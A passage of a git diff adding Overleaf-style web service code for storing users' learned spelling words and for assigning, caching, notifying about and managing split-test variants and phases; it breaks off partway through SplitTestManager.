true, + }, + callback + ) + }) + }, + + unlearnWord(userToken, word, callback) { + return db.spellingPreferences.updateOne( + { + token: userToken, + }, + { + $pull: { learnedWords: word }, + }, + callback + ) + }, + + getLearnedWords(userToken, callback) { + db.spellingPreferences.findOne( + { token: userToken }, + function (error, preferences) { + if (error != null) { + return callback(OError.tag(error)) + } + let words = + (preferences != null ? preferences.learnedWords : undefined) || [] + if (words) { + // remove duplicates + words = words.filter( + (value, index, self) => self.indexOf(value) === index + ) + } + callback(null, words) + } + ) + }, + + getLearnedWordsSize(userToken, callback) { + db.spellingPreferences.findOne( + { token: userToken }, + function (error, preferences) { + if (error != null) { + return callback(OError.tag(error)) + } + const words = (preferences && preferences.learnedWords) || [] + const wordsSize = Buffer.from(JSON.stringify(words)).length + callback(null, wordsSize) + } + ) + }, + + deleteUsersLearnedWords(userToken, callback) { + db.spellingPreferences.deleteOne({ token: userToken }, callback) + }, +} + +const promises = { + learnWord: promisify(LearnedWordsManager.learnWord), + unlearnWord: promisify(LearnedWordsManager.unlearnWord), + getLearnedWords: promisify(LearnedWordsManager.getLearnedWords), + deleteUsersLearnedWords: promisify( + LearnedWordsManager.deleteUsersLearnedWords + ), +} + +LearnedWordsManager.promises = promises + +module.exports = LearnedWordsManager diff --git a/services/web/app/src/Features/Spelling/SpellingController.mjs b/services/web/app/src/Features/Spelling/SpellingController.mjs new file mode 100644 index 0000000..7790193 --- /dev/null +++ b/services/web/app/src/Features/Spelling/SpellingController.mjs @@ -0,0 +1,22 @@ +import SessionManager from '../Authentication/SessionManager.js' +import LearnedWordsManager from './LearnedWordsManager.js' + +export default { + learn(req, res, next) { + const { word } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + LearnedWordsManager.learnWord(userId, word, err => { + if (err) return next(err) + res.sendStatus(204) + }) + }, + + unlearn(req, res, next) { + const { word } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + LearnedWordsManager.unlearnWord(userId, word, err => { + if (err) return next(err) + res.sendStatus(204) + }) + }, +} diff --git a/services/web/app/src/Features/Spelling/SpellingHandler.js b/services/web/app/src/Features/Spelling/SpellingHandler.js new file mode 100644 index 0000000..8d6c42b --- /dev/null +++ b/services/web/app/src/Features/Spelling/SpellingHandler.js @@ -0,0 +1,29 @@ +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const { promisifyAll } = require('@overleaf/promise-utils') +const LearnedWordsManager = require('./LearnedWordsManager') + +module.exports = { + getUserDictionary(userId, callback) { + const timer = new Metrics.Timer('spelling_get_dict') + LearnedWordsManager.getLearnedWords(userId, (error, words) => { + if (error) { + return callback( + OError.tag(error, 'error getting user dictionary', { error, userId }) + ) + } + timer.done() + callback(null, words) + }) + }, + + deleteWordFromUserDictionary(userId, word, callback) { + LearnedWordsManager.unlearnWord(userId, word, callback) + }, + + deleteUserDictionary(userId, callback) { + LearnedWordsManager.deleteUsersLearnedWords(userId, callback) + }, +} + +module.exports.promises = 
promisifyAll(module.exports) diff --git a/services/web/app/src/Features/SplitTests/LocalsHelper.js b/services/web/app/src/Features/SplitTests/LocalsHelper.js new file mode 100644 index 0000000..14bfa96 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/LocalsHelper.js @@ -0,0 +1,18 @@ +function setSplitTestVariant(locals, splitTestName, variant) { + if (!locals.splitTestVariants) { + locals.splitTestVariants = {} + } + locals.splitTestVariants[splitTestName] = variant +} + +function setSplitTestInfo(locals, splitTestName, info) { + if (!locals.splitTestInfo) { + locals.splitTestInfo = {} + } + locals.splitTestInfo[splitTestName] = info +} + +module.exports = { + setSplitTestVariant, + setSplitTestInfo, +} diff --git a/services/web/app/src/Features/SplitTests/SlackNotificationManager.js b/services/web/app/src/Features/SplitTests/SlackNotificationManager.js new file mode 100644 index 0000000..e90d495 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SlackNotificationManager.js @@ -0,0 +1,65 @@ +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { IncomingWebhook } = require('@slack/webhook') +const moment = require('moment') +const SplitTestUtils = require('./SplitTestUtils') + +async function sendNotification(splitTest, action, user) { + const lastVersion = SplitTestUtils.getCurrentVersion(splitTest) + const url = lastVersion.analyticsEnabled + ? Settings.splitTest.notification.splitTestSlackWebhookUrl + : Settings.splitTest.notification.gradualRolloutSlackWebhookUrl + if (!url) { + logger.info('Skipping slack notification as webhook URL is not configured') + return + } + + const webhook = new IncomingWebhook(url) + + const defaultRolloutPercent = + 100 - + lastVersion.variants.reduce( + (total, variant) => total + variant.rolloutPercent, + 0 + ) + const variantsConfig = [ + `- default: ${defaultRolloutPercent}%`, + ...lastVersion.variants.map( + variant => `- ${variant.name}: ${variant.rolloutPercent}%` + ), + ].join('\n') + + const date = splitTest.archived ? splitTest.archivedAt : lastVersion.createdAt + const comment = + action !== 'archived' && lastVersion.comment + ? 
`with comment: ${lastVersion.comment}` + : '' + + const payload = { + name: splitTest.name, + action, + phase: lastVersion.phase, + description: splitTest.description, + ticketURL: splitTest.ticketUrl, + variantsConfig, + active: lastVersion.active.toString(), + author: user.email, + date: moment(date).utc().format('Do MMM YYYY, h:mm a') + ' UTC', + comment, + versionNumber: `${lastVersion.versionNumber}`, + url: `${Settings.siteUrl}/admin/split-test/edit/${splitTest.name}`, + } + try { + const { send: sendPayload } = webhook // workaround for the lint_flag_res_send_usage rule false-positive + await sendPayload.call(webhook, payload) + } catch (err) { + logger.error( + { err }, + 'Failed to notify split test notifications Slack webhook' + ) + } +} + +module.exports = { + sendNotification, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestCache.js b/services/web/app/src/Features/SplitTests/SplitTestCache.js new file mode 100644 index 0000000..4f81b45 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestCache.js @@ -0,0 +1,27 @@ +const Metrics = require('@overleaf/metrics') +const SplitTestManager = require('./SplitTestManager') +const { CacheLoader } = require('cache-flow') + +class SplitTestCache extends CacheLoader { + constructor() { + super('split-test', { + expirationTime: 60, // 1min in seconds + }) + } + + async load() { + Metrics.inc('split_test_get_split_test_from_mongo', 1, {}) + const splitTests = await SplitTestManager.getRuntimeTests() + return new Map(splitTests.map(splitTest => [splitTest.name, splitTest])) + } + + serialize(value) { + return value + } + + deserialize(value) { + return value + } +} + +module.exports = new SplitTestCache() diff --git a/services/web/app/src/Features/SplitTests/SplitTestHandler.js b/services/web/app/src/Features/SplitTests/SplitTestHandler.js new file mode 100644 index 0000000..5dcf009 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestHandler.js @@ -0,0 +1,691 @@ +const Metrics = require('@overleaf/metrics') +const UserUpdater = require('../User/UserUpdater') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const LocalsHelper = require('./LocalsHelper') +const crypto = require('crypto') +const _ = require('lodash') +const { callbackify } = require('util') +const SplitTestCache = require('./SplitTestCache') +const { SplitTest } = require('../../models/SplitTest') +const UserAnalyticsIdCache = require('../Analytics/UserAnalyticsIdCache') +const Features = require('../../infrastructure/Features') +const SplitTestUtils = require('./SplitTestUtils') +const Settings = require('@overleaf/settings') +const SessionManager = require('../Authentication/SessionManager') +const logger = require('@overleaf/logger') +const SplitTestSessionHandler = require('./SplitTestSessionHandler') +const SplitTestUserGetter = require('./SplitTestUserGetter') + +/** + * @import { Assignment } from "./types" + */ + +const DEFAULT_VARIANT = 'default' +const ALPHA_PHASE = 'alpha' +const BETA_PHASE = 'beta' +const RELEASE_PHASE = 'release' +const DEFAULT_ASSIGNMENT = { + variant: DEFAULT_VARIANT, + metadata: {}, +} + +/** + * Get the assignment of a user to a split test and store it in the response locals context + * + * @example + * // Assign user and record an event + * + * const assignment = await SplitTestHandler.getAssignment(req, res, 'example-project') + * if (assignment.variant === 'awesome-new-version') { + * // execute my awesome change + * } + * else { + * // execute the default behaviour 
(control group) + * } + * + * @param req the request + * @param res the Express response object + * @param splitTestName the unique name of the split test + * @param options {Object<sync: boolean>} - for test purposes only, to force the synchronous update of the user's profile + * @returns {Promise<Assignment>} + */ +async function getAssignment(req, res, splitTestName, { sync = false } = {}) { + const query = req.query || {} + let assignment + + try { + if (!Features.hasFeature('saas')) { + assignment = _getNonSaasAssignment(splitTestName) + } else { + await _loadSplitTestInfoInLocals(res.locals, splitTestName, req.session) + + // Check the query string for an override, ignoring an invalid value + const queryVariant = query[splitTestName] + if (queryVariant) { + const variants = await _getVariantNames(splitTestName) + if (variants.includes(queryVariant)) { + assignment = { + variant: queryVariant, + metadata: {}, + } + } + } + + if (!assignment) { + const { userId, analyticsId } = AnalyticsManager.getIdsFromSession( + req.session + ) + assignment = await _getAssignment(splitTestName, { + analyticsId, + userId, + session: req.session, + sync, + }) + SplitTestSessionHandler.collectSessionStats(req.session) + } + } + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment') + assignment = DEFAULT_ASSIGNMENT + } + + LocalsHelper.setSplitTestVariant( + res.locals, + splitTestName, + assignment.variant + ) + + return assignment +} + +/** + * Get the assignment of a user to a split test by their user ID. + * + * Warning: this does not support query parameters override, nor makes the assignment and split test info available to + * the frontend through locals. Wherever possible, `getAssignment` should be used instead. + * + * @param userId the user ID + * @param splitTestName the unique name of the split test + * @param options {Object<sync: boolean>} - for test purposes only, to force the synchronous update of the user's profile + * @returns {Promise<Assignment>} + */ +async function getAssignmentForUser( + userId, + splitTestName, + { sync = false } = {} +) { + try { + if (!Features.hasFeature('saas')) { + return _getNonSaasAssignment(splitTestName) + } + + const analyticsId = await UserAnalyticsIdCache.get(userId) + return _getAssignment(splitTestName, { analyticsId, userId, sync }) + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment for user') + return DEFAULT_ASSIGNMENT + } +} + +/** + * Returns true if user has already been explicitly assigned to a variant. + * This will be false if the user **would** be assigned when calling getAssignment but hasn't yet. 
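+ *
+ * @example
+ * // Sketch: 'example-test' and 'new-variant' are hypothetical names
+ * const alreadyAssigned = await hasUserBeenAssignedToVariant(
+ *   req,
+ *   userId,
+ *   'example-test',
+ *   'new-variant'
+ * )
+ * if (alreadyAssigned) {
+ *   // the variant was already persisted for this user
+ * }
+ *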
+ * + * @param req express request + * @param {string} userId the user ID + * @param {string} splitTestName the unique name of the split test + * @param {string} variant variant name to check + * @param {boolean} ignoreVersion users explicitly assigned to a previous version should be treated as if assigned to latest version + */ +async function hasUserBeenAssignedToVariant( + req, + userId, + splitTestName, + variant, + ignoreVersion = false +) { + try { + const { session, query = {} } = req + + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if ( + !userId || + !SessionManager.isUserLoggedIn(session) || + !currentVersion?.active + ) { + return false + } + + // Check the query string for an override, ignoring an invalid value + const queryVariant = query[splitTestName] + if (queryVariant === variant) { + const variants = await _getVariantNames(splitTestName) + if (variants.includes(queryVariant)) { + return true + } + } + + // Allow dev toolbar and session cache to override assignment from DB + if (Settings.devToolbar.enabled) { + const override = session?.splitTestOverrides?.[splitTestName] + if (override === variant) { + return true + } + } + + const canUseSessionCache = session && SessionManager.isUserLoggedIn(session) + if (canUseSessionCache) { + const cachedVariant = SplitTestSessionHandler.getCachedVariant( + session, + splitTestName, + currentVersion + ) + if (cachedVariant === variant) { + return true + } + } + + // get variant from db, including explicit assignments from previous versions if requested + const assignments = await getActiveAssignmentsForUser( + userId, + true, + ignoreVersion + ) + const testAssignment = assignments[splitTestName] + + if (!testAssignment || !testAssignment.assignedAt) { + return false + } + + // if variant matches and we can use cache, we should persist it in cache + if (testAssignment.variantName === variant && testAssignment.assignedAt) { + if (canUseSessionCache) { + SplitTestSessionHandler.setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName: variant, + activeForUser: true, + }) + } + return true + } + } catch (error) { + logger.error({ err: error }, 'Failed to get split test assignment for user') + return false + } +} + +/** + * Get a mapping of the active split test assignments for the given user + */ +async function getActiveAssignmentsForUser( + userId, + removeArchived = false, + ignoreVersion = false +) { + if (!Features.hasFeature('saas')) { + return {} + } + + const user = await SplitTestUserGetter.promises.getUser(userId) + if (user == null) { + return {} + } + + const splitTests = await SplitTest.find({ + $where: 'this.versions[this.versions.length - 1].active', + ...(removeArchived && { archived: { $ne: true } }), + }).exec() + const assignments = {} + for (const splitTest of splitTests) { + const { activeForUser, selectedVariantName, phase, versionNumber } = + await _getAssignmentMetadata(user.analyticsId, user, splitTest) + if (activeForUser) { + const assignment = { + variantName: selectedVariantName, + versionNumber, + phase, + } + const userAssignments = user.splitTests?.[splitTest.name] + if (Array.isArray(userAssignments)) { + let userAssignment + if (!ignoreVersion) { + userAssignment = userAssignments.find( + x => x.versionNumber === versionNumber + ) + } else { + userAssignment = userAssignments[0] + } + if (userAssignment) { + assignment.assignedAt = userAssignment.assignedAt + } + } + 
assignments[splitTest.name] = assignment + } + } + return assignments +} + +/** + * Performs a one-time assignment that is not recorded nor reproducible. + * To be used only in cases where we need random assignments that are independent of a user or session. + * If the test is in alpha or beta phase, always returns the default variant. + * @param splitTestName + * @returns {Promise<Assignment>} + */ +async function getOneTimeAssignment(splitTestName) { + try { + if (!Features.hasFeature('saas')) { + return _getNonSaasAssignment(splitTestName) + } + + const splitTest = await _getSplitTest(splitTestName) + if (!splitTest) { + return DEFAULT_ASSIGNMENT + } + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if (currentVersion.phase !== RELEASE_PHASE) { + return DEFAULT_ASSIGNMENT + } + + const randomUUID = crypto.randomUUID() + const { selectedVariantName } = await _getAssignmentMetadata( + randomUUID, + undefined, + splitTest + ) + return _makeAssignment({ + variant: selectedVariantName, + currentVersion, + isFirstNonDefaultAssignment: + selectedVariantName !== DEFAULT_VARIANT && _isSplitTest(splitTest), + }) + } catch (error) { + logger.error({ err: error }, 'Failed to get one time split test assignment') + return DEFAULT_ASSIGNMENT + } +} + +/** + * Returns an array of valid variant names for the given split test, including default + * + * @param splitTestName + * @returns {Promise<string[]>} + * @private + */ +async function _getVariantNames(splitTestName) { + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + if (currentVersion?.active) { + return currentVersion.variants.map(v => v.name).concat([DEFAULT_VARIANT]) + } else { + return [DEFAULT_VARIANT] + } +} + +async function _getAssignment( + splitTestName, + { analyticsId, user, userId, session, sync } +) { + if (!analyticsId && !userId) { + return DEFAULT_ASSIGNMENT + } + + const splitTest = await _getSplitTest(splitTestName) + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + + if (Settings.devToolbar.enabled) { + const override = session?.splitTestOverrides?.[splitTestName] + if (override) { + return _makeAssignment({ variant: override, currentVersion }) + } + } + + if (!currentVersion?.active) { + return DEFAULT_ASSIGNMENT + } + + // Do not cache assignments for anonymous users. All the context for their assignments is in the session: + // They cannot be part of the alpha or beta program, and they will use their analyticsId for assignments. 
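+  // Illustrative consequence: a logged-in user's variant may be served from
+  // session.cachedSplitTestAssignments, while an anonymous user's variant is
+  // recomputed deterministically from the md5-based percentile of their
+  // analyticsId on each request (their cache entry is purged just below).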
+ const canUseSessionCache = session && SessionManager.isUserLoggedIn(session) + if (session && !canUseSessionCache) { + // Purge the existing cache + delete session.cachedSplitTestAssignments + } + + if (canUseSessionCache) { + const cachedVariant = SplitTestSessionHandler.getCachedVariant( + session, + splitTest.name, + currentVersion + ) + + if (cachedVariant) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'cache' }) + if ( + cachedVariant === + SplitTestSessionHandler.CACHE_TOMBSTONE_SPLIT_TEST_NOT_ACTIVE_FOR_USER + ) { + return DEFAULT_ASSIGNMENT + } else { + return _makeAssignment({ + variant: cachedVariant, + currentVersion, + isFirstNonDefaultAssignment: false, + }) + } + } + } + + if (user) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'provided' }) + } else if (userId) { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'mongo' }) + } else { + Metrics.inc('split_test_get_assignment_source', 1, { status: 'none' }) + } + + user = + user || + (userId && + (await SplitTestUserGetter.promises.getUser(userId, splitTestName))) + const metadata = await _getAssignmentMetadata(analyticsId, user, splitTest) + const { activeForUser, selectedVariantName, phase, versionNumber } = metadata + + if (canUseSessionCache) { + SplitTestSessionHandler.setVariantInCache({ + session, + splitTestName, + currentVersion, + selectedVariantName, + activeForUser, + }) + } + + if (activeForUser) { + if (_isSplitTest(splitTest)) { + // if the user is logged in, persist the assignment + if (userId) { + const assignmentData = { + user, + userId, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + } + if (sync === true) { + await _recordAssignment(assignmentData) + } else { + _recordAssignment(assignmentData).catch(err => { + logger.warn( + { + err, + userId, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + }, + 'failed to record split test assignment' + ) + }) + } + } + // otherwise this is an anonymous user, we store assignments in session to persist them on registration + else { + await SplitTestSessionHandler.promises.appendAssignment(session, { + splitTestId: splitTest._id, + splitTestName, + phase, + versionNumber, + variantName: selectedVariantName, + assignedAt: new Date(), + }) + } + + const effectiveAnalyticsId = user?.analyticsId || analyticsId || userId + AnalyticsManager.setUserPropertyForAnalyticsId( + effectiveAnalyticsId, + `split-test-${splitTestName}-${versionNumber}`, + selectedVariantName + ).catch(err => { + logger.warn( + { + err, + analyticsId: effectiveAnalyticsId, + splitTest: splitTestName, + versionNumber, + variant: selectedVariantName, + }, + 'failed to set user property for analytics id' + ) + }) + } + let isFirstNonDefaultAssignment + if (userId) { + isFirstNonDefaultAssignment = metadata.isFirstNonDefaultAssignment + } else { + const assignments = + await SplitTestSessionHandler.promises.getAssignments(session) + isFirstNonDefaultAssignment = !assignments?.[splitTestName] + } + + return _makeAssignment({ + variant: selectedVariantName, + currentVersion, + isFirstNonDefaultAssignment, + }) + } + + return DEFAULT_ASSIGNMENT +} + +async function _getAssignmentMetadata(analyticsId, user, splitTest) { + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + const versionNumber = currentVersion.versionNumber + const phase = currentVersion.phase + + // For continuity on phase rollout for gradual rollouts, we keep all users from the previous phase enrolled to the 
variant. + // In beta, all alpha users are cohorted to the variant, and the same in release phase all alpha & beta users. + if ( + _isGradualRollout(splitTest) && + ((phase === BETA_PHASE && user?.alphaProgram) || + (phase === RELEASE_PHASE && (user?.alphaProgram || user?.betaProgram))) + ) { + return { + activeForUser: true, + selectedVariantName: currentVersion.variants[0].name, + phase, + versionNumber, + isFirstNonDefaultAssignment: false, + } + } + + if ( + (phase === ALPHA_PHASE && !user?.alphaProgram) || + (phase === BETA_PHASE && !user?.betaProgram) + ) { + return { + activeForUser: false, + } + } + + const userId = user?._id.toString() + const percentile = getPercentile(analyticsId || userId, splitTest.name, phase) + const selectedVariantName = + _getVariantFromPercentile(currentVersion.variants, percentile) || + DEFAULT_VARIANT + return { + activeForUser: true, + selectedVariantName, + phase, + versionNumber, + isFirstNonDefaultAssignment: + selectedVariantName !== DEFAULT_VARIANT && + _isSplitTest(splitTest) && + (!Array.isArray(user?.splitTests?.[splitTest.name]) || + !user?.splitTests?.[splitTest.name]?.some( + assignment => assignment.variantName !== DEFAULT_VARIANT + )), + } +} + +function getPercentile(analyticsId, splitTestName, splitTestPhase) { + const hash = crypto + .createHash('md5') + .update(analyticsId + splitTestName + splitTestPhase) + .digest('hex') + const hashPrefix = hash.substr(0, 8) + return Math.floor( + ((parseInt(hashPrefix, 16) % 0xffffffff) / 0xffffffff) * 100 + ) +} + +function setOverrideInSession(session, splitTestName, variantName) { + if (!Settings.devToolbar.enabled) { + return + } + if (!session.splitTestOverrides) { + session.splitTestOverrides = {} + } + session.splitTestOverrides[splitTestName] = variantName +} + +function clearOverridesInSession(session) { + delete session.splitTestOverrides +} + +function _getVariantFromPercentile(variants, percentile) { + for (const variant of variants) { + for (const stripe of variant.rolloutStripes) { + if (percentile >= stripe.start && percentile < stripe.end) { + return variant.name + } + } + } +} + +async function _recordAssignment({ + user, + userId, + splitTestName, + phase, + versionNumber, + variantName, +}) { + const persistedAssignment = { + variantName, + versionNumber, + phase, + assignedAt: new Date(), + } + user = + user || (await SplitTestUserGetter.promises.getUser(userId, splitTestName)) + if (user) { + const assignedSplitTests = user.splitTests || [] + const assignmentLog = assignedSplitTests[splitTestName] || [] + const existingAssignment = _.find(assignmentLog, { versionNumber }) + if (!existingAssignment) { + await UserUpdater.promises.updateUser(userId, { + $addToSet: { + [`splitTests.${splitTestName}`]: persistedAssignment, + }, + }) + } + } +} + +function _makeAssignment({ + variant, + currentVersion, + isFirstNonDefaultAssignment, +}) { + return { + variant, + metadata: { + phase: currentVersion.phase, + versionNumber: currentVersion.versionNumber, + isFirstNonDefaultAssignment, + }, + } +} + +async function _loadSplitTestInfoInLocals(locals, splitTestName, session) { + const splitTest = await _getSplitTest(splitTestName) + if (splitTest) { + const override = session?.splitTestOverrides?.[splitTestName] + + const currentVersion = SplitTestUtils.getCurrentVersion(splitTest) + if (!currentVersion.active && !Settings.devToolbar.enabled) { + return + } + + const phase = currentVersion.phase + const info = { + phase, + badgeInfo: splitTest.badgeInfo?.[phase], + } + if 
(Settings.devToolbar.enabled) { + info.active = currentVersion.active + info.variants = currentVersion.variants.map(variant => ({ + name: variant.name, + rolloutPercent: variant.rolloutPercent, + })) + info.hasOverride = !!override + } + LocalsHelper.setSplitTestInfo(locals, splitTestName, info) + } else if (Settings.devToolbar.enabled) { + LocalsHelper.setSplitTestInfo(locals, splitTestName, { + missing: true, + }) + } +} + +function _getNonSaasAssignment(splitTestName) { + if (Settings.splitTestOverrides?.[splitTestName]) { + return { + variant: Settings.splitTestOverrides?.[splitTestName], + metadata: {}, + } + } + return DEFAULT_ASSIGNMENT +} + +async function _getSplitTest(name) { + const splitTests = await SplitTestCache.get('') + const splitTest = splitTests?.get(name) + if (splitTest && !splitTest.archived) { + return splitTest + } +} + +function _isSplitTest(featureFlag) { + return SplitTestUtils.getCurrentVersion(featureFlag).analyticsEnabled +} + +function _isGradualRollout(featureFlag) { + return !SplitTestUtils.getCurrentVersion(featureFlag).analyticsEnabled +} + +module.exports = { + getPercentile, + getAssignment: callbackify(getAssignment), + getAssignmentForUser: callbackify(getAssignmentForUser), + getOneTimeAssignment: callbackify(getOneTimeAssignment), + getActiveAssignmentsForUser: callbackify(getActiveAssignmentsForUser), + hasUserBeenAssignedToVariant: callbackify(hasUserBeenAssignedToVariant), + setOverrideInSession, + clearOverridesInSession, + promises: { + getAssignment, + getAssignmentForUser, + getOneTimeAssignment, + getActiveAssignmentsForUser, + hasUserBeenAssignedToVariant, + }, +} diff --git a/services/web/app/src/Features/SplitTests/SplitTestManager.js b/services/web/app/src/Features/SplitTests/SplitTestManager.js new file mode 100644 index 0000000..16120f5 --- /dev/null +++ b/services/web/app/src/Features/SplitTests/SplitTestManager.js @@ -0,0 +1,485 @@ +const { SplitTest } = require('../../models/SplitTest') +const SplitTestUtils = require('./SplitTestUtils') +const OError = require('@overleaf/o-error') +const _ = require('lodash') +const { CacheFlow } = require('cache-flow') + +const ALPHA_PHASE = 'alpha' +const BETA_PHASE = 'beta' +const RELEASE_PHASE = 'release' + +async function getSplitTests({ name, phase, type, active, archived }) { + const filters = {} + if (name && name !== '') { + filters.name = { $regex: _.escapeRegExp(name) } + } + if (active) { + filters.$where = 'this.versions[this.versions.length - 1].active === true' + } + if (type === 'split-test') { + const query = + 'this.versions[this.versions.length - 1].analyticsEnabled === true' + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (type === 'gradual-rollout') { + const query = + 'this.versions[this.versions.length - 1].analyticsEnabled === false' + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (['alpha', 'beta', 'release'].includes(phase)) { + const query = `this.versions[this.versions.length - 1].phase === "${phase}"` + if (filters.$where) { + filters.$where += `&& ${query}` + } else { + filters.$where = query + } + } + if (archived === true) { + filters.archived = true + } else if (archived === false) { + filters.archived = { $ne: true } + } + try { + return await SplitTest.find(filters) + .populate('archivedBy', ['email', 'first_name', 'last_name']) + .populate('versions.author', ['email', 'first_name', 'last_name']) + .limit(300) + .exec() + } catch (error) { + throw 
OError.tag(error, 'Failed to get split tests list') + } +} + +async function getRuntimeTests() { + try { + return SplitTest.find({}).lean().exec() + } catch (error) { + throw OError.tag(error, 'Failed to get active split tests list') + } +} + +async function getSplitTest(query) { + try { + return await SplitTest.findOne(query) + .populate('archivedBy', ['email', 'first_name', 'last_name']) + .populate('versions.author', ['email', 'first_name', 'last_name']) + .exec() + } catch (error) { + throw OError.tag(error, 'Failed to get split test', { query }) + } +} + +async function createSplitTest( + { name, configuration, badgeInfo = {}, info = {} }, + userId +) { + const stripedVariants = [] + let stripeStart = 0 + + _checkNewVariantsConfiguration( + [], + configuration.variants, + configuration.analyticsEnabled + ) + for (const variant of configuration.variants) { + stripedVariants.push({ + name: (variant.name || '').trim(), + rolloutPercent: variant.rolloutPercent, + rolloutStripes: + variant.rolloutPercent > 0 + ? [ + { + start: stripeStart, + end: stripeStart + variant.rolloutPercent, + }, + ] + : [], + }) + stripeStart += variant.rolloutPercent + } + const splitTest = new SplitTest({ + name: (name || '').trim(), + description: info.description, + ticketUrl: info.ticketUrl, + reportsUrls: info.reportsUrls, + winningVariant: info.winningVariant, + badgeInfo, + versions: [ + { + versionNumber: 1, + phase: configuration.phase, + active: configuration.active, + analyticsEnabled: + configuration.active && configuration.analyticsEnabled, + variants: stripedVariants, + author: userId, + }, + ], + expectedEndDate: info.expectedEndDate, + expectedUplift: info.expectedUplift, + requiredCohortSize: info.requiredCohortSize, + }) + return _saveSplitTest(splitTest) +} + +async function updateSplitTestConfig({ name, configuration, comment }, userId) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + if (splitTest.archived) { + throw new OError('Cannot update an archived split test', { name }) + } + const lastVersion = SplitTestUtils.getCurrentVersion(splitTest).toObject() + if (configuration.phase !== lastVersion.phase) { + throw new OError( + `Cannot update with different phase - use /switch-to-next-phase endpoint instead` + ) + } + _checkNewVariantsConfiguration( + lastVersion.variants, + configuration.variants, + configuration.analyticsEnabled + ) + const updatedVariants = _updateVariantsWithNewConfiguration( + lastVersion.variants, + configuration.variants + ) + + splitTest.versions.push({ + versionNumber: lastVersion.versionNumber + 1, + phase: configuration.phase, + active: configuration.active, + analyticsEnabled: configuration.analyticsEnabled, + variants: updatedVariants, + author: userId, + comment, + }) + return _saveSplitTest(splitTest) +} + +async function updateSplitTestInfo(name, info) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + splitTest.description = info.description + splitTest.expectedEndDate = info.expectedEndDate + splitTest.ticketUrl = info.ticketUrl + splitTest.reportsUrls = info.reportsUrls + splitTest.winningVariant = info.winningVariant + return _saveSplitTest(splitTest) +} + +async function updateSplitTestBadgeInfo(name, badgeInfo) { + const splitTest = await getSplitTest({ name }) + if (!splitTest) { + throw new OError(`Cannot update split test '${name}': not found`) + } + 
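+  // badgeInfo is keyed by phase; SplitTestHandler exposes the current phase's entry to
+  // templates via splitTest.badgeInfo?.[phase] in _loadSplitTestInfoInLocals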
+  splitTest.badgeInfo = badgeInfo
+  return _saveSplitTest(splitTest)
+}
+
+async function replaceSplitTests(tests) {
+  _checkEnvIsSafe('replace')
+
+  try {
+    await _deleteSplitTests()
+    return await SplitTest.create(tests)
+  } catch (error) {
+    throw OError.tag(error, 'Failed to replace all split tests', { tests })
+  }
+}
+
+async function mergeSplitTests(incomingTests, overWriteLocal) {
+  _checkEnvIsSafe('merge')
+
+  // this is required as the query returns models, and we need all the items to be plain objects,
+  // similar to the ones we receive as incomingTests
+  const localTests = await SplitTest.find({}).lean().exec()
+
+  let merged
+  // _mergeFlags preserves the state of the base tests (its second argument):
+  // e.g. if inTest is in phase 1 and baseTest is in phase 2, the merged test stays in phase 2.
+  // swapping the order of the args therefore overwrites the local tests with the incoming ones
+  if (overWriteLocal) {
+    merged = _mergeFlags(localTests, incomingTests)
+  } else {
+    merged = _mergeFlags(incomingTests, localTests)
+  }
+
+  try {
+    await _deleteSplitTests()
+    const success = await SplitTest.create(merged)
+    return success
+  } catch (error) {
+    throw OError.tag(error, 'Failed to merge all split tests, merged set was', {
+      merged,
+    })
+  }
+}
+
+async function switchToNextPhase({ name, comment }, userId) {
+  const splitTest = await getSplitTest({ name })
+  if (!splitTest) {
+    throw new OError(
+      `Cannot switch split test with ID '${name}' to next phase: not found`
+    )
+  }
+  if (splitTest.archived) {
+    throw new OError('Cannot switch an archived split test to next phase', {
+      name,
+    })
+  }
+  const lastVersionCopy = SplitTestUtils.getCurrentVersion(splitTest).toObject()
+  lastVersionCopy.versionNumber++
+  if (lastVersionCopy.phase === ALPHA_PHASE) {
+    lastVersionCopy.phase = BETA_PHASE
+  } else if (lastVersionCopy.phase === BETA_PHASE) {
+    if (splitTest.forbidReleasePhase) {
+      throw new OError('Switch to release phase is disabled for this test', {
+        name,
+      })
+    }
+    lastVersionCopy.phase = RELEASE_PHASE
+  } else if (lastVersionCopy.phase === RELEASE_PHASE) {
+    throw new OError(
+      `Split test with ID '${name}' is already in the release phase`
+    )
+  }
+  // each new phase starts over from a 0% rollout
+  for (const variant of lastVersionCopy.variants) {
+    variant.rolloutPercent = 0
+    variant.rolloutStripes = []
+  }
+  lastVersionCopy.author = userId
+  lastVersionCopy.comment = comment
+  lastVersionCopy.createdAt = new Date()
+  splitTest.versions.push(lastVersionCopy)
+  return _saveSplitTest(splitTest)
+}
+
+async function revertToPreviousVersion(
+  { name, versionNumber, comment },
+  userId
+) {
+  const splitTest = await getSplitTest({ name })
+  if (!splitTest) {
+    throw new OError(
+      `Cannot revert split test with ID '${name}' to previous version: not found`
+    )
+  }
+  if (splitTest.archived) {
